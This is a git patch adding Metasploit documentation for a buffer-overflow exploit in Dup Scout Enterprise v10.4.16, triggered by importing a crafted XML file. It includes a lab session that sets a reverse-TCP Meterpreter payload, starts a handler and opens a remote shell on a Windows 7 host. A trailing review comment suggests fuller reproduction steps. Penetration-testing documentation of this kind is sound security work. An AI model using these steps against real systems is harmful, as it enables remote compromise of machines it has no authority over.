From c1ff0c1e002a42388589307ed2cdf688a1f056b2 Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Wed, 24 Jan 2018 20:47:02 +0000 Subject: [PATCH] Dup Scout XML documentation --- .../windows/fileformat/dupscout_xml.md | 45 +++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 documentation/modules/exploit/windows/fileformat/dupscout_xml.md diff --git a/documentation/modules/exploit/windows/fileformat/dupscout_xml.md b/documentation/modules/exploit/windows/fileformat/dupscout_xml.md new file mode 100644 index 0000000000..bd380838c0 --- /dev/null +++ b/documentation/modules/exploit/windows/fileformat/dupscout_xml.md 
@@ -0,0 +1,45 @@ +This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16 by using the import command option to import a specially crafted xml file. + +## Vulnerable Application + +This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [www.dupscout.com](http://www.dupscout.com/setups/dupscoutent_setup_v10.4.16.exe). + +## Verification Steps + +1. Start msfconsole +2. Do: `exploit/windows/fileformat/dupscout_xml` +3. Do: `set PAYLOAD [PAYLOAD]` +4. Do: `run` + +## Example +``` +msf > use exploit/windows/fileformat/dupscout_xml +msf exploit(windows/fileformat/dupscout_xml) > set PAYLOAD windows/meterpreter/reverse_tcp +PAYLOAD => windows/meterpreter/reverse_tcp +msf exploit(windows/fileformat/dupscout_xml) > set LHOST 172.16.40.146 +LHOST => 172.16.40.146 +msf exploit(windows/fileformat/dupscout_xml) > run + +[*] Creating 'msf.xml' file ... +[+] msf.xml stored at /root/.msf4/local/msf.xml +msf exploit(windows/fileformat/dupscout_xml) > use exploit/multi/handler +msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp +PAYLOAD => windows/meterpreter/reverse_tcp +msf exploit(multi/handler) > set LHOST 172.16.40.146 +LHOST => 172.16.40.146 +msf exploit(multi/handler) > run + +[*] Started reverse TCP handler on 172.16.40.146:4444 +[*] Sending stage (179779 bytes) to 172.16.40.144 +[*] Meterpreter session 1 opened (172.16.40.146:4444 -> 172.16.40.144:49790) at 2018-01-24 20:56:56 +0000 + +meterpreter > sysinfo +Computer : PC +OS : Windows 7 (Build 7601, Service Pack 1). +Architecture : x86 +System Language : pt_PT +Domain : WORKGROUP +Logged On Users : 1 +Meterpreter : x86/windows +meterpreter > +```
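Review bot: In "Verification Steps", step 2 reads `Do: exploit/windows/fileformat/dupscout_xml` and is missing the `use` verb; it should read `Do: use exploit/windows/fileformat/dupscout_xml`, matching the first line of the Example session. The steps are also incomplete relative to the Example below them: the Example sets `LHOST` before `run`, then switches to `exploit/multi/handler` with the same `PAYLOAD` and `LHOST` to catch the session, but none of that appears in the numbered steps, and neither does the step where the generated `msf.xml` is imported into Dup Scout via the import command option (the first sentence of the file says this is what triggers the overflow). Suggest extending the list to, e.g., `3. Do: set LHOST [IP]`, `5. Start exploit/multi/handler with the same PAYLOAD and LHOST`, `6. Import the generated msf.xml in Dup Scout Enterprise on the target`, so a reader can reproduce the session shown in the Example without inferring the missing steps. Minor: the Example fence has no language tag; other module docs in this tree usually tag it so it renders consistently.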